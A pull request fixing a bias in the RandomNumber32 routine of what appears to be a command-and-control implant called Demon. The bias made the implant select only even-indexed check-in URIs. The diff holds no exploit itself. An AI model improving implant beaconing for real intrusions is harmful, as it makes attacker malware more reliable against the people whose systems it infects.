### PR TITLE
Update RandomNumber32

### DIFF
--- a/payloads/Demon/src/core/Win32.c
+++ b/payloads/Demon/src/core/Win32.c
@@ -1309,7 +1309,7 @@ ULONG RandomNumber32(
     Seed = NtGetTickCount();
     Seed = Instance->Win32.RtlRandomEx( &Seed );
 
-    return Seed % LONG_MAX;
+    return Seed;
 }
 
 /*!

--- a/payloads/Demon/src/core/Win32.c
+++ b/payloads/Demon/src/core/Win32.c
@@ -1308,10 +1308,8 @@ ULONG RandomNumber32(
 
     Seed = NtGetTickCount();
     Seed = Instance->Win32.RtlRandomEx( &Seed );
-    Seed = Instance->Win32.RtlRandomEx( &Seed );
-    Seed = ( Seed % ( LONG_MAX - 2 + 1 ) ) + 2;
 
-    return Seed % 2 == 0 ? Seed : Seed + 1;
+    return Seed % LONG_MAX;
 }
 
 /*!


### PR DESCRIPTION
The `RandomNumber32` function was only producing even numbers.

This meant that for example if you had a list of two checkin URIs, it would always pick the first one (bc any even number % 2 will be 0). Or if your URI list was an even length, then it would only ever pick a URI at an even index.

I've updated the function to remove this bias.

fwiw I've got another branch that uses the `_rdrand32_step` intrinsic to make use of the `rdrand` instruction where supported. This avoids calls to `RtlRandomEx` (which uses `rdrand` itself anyway), but I'm not sure if it really adds anything other than meaning it can be inlined.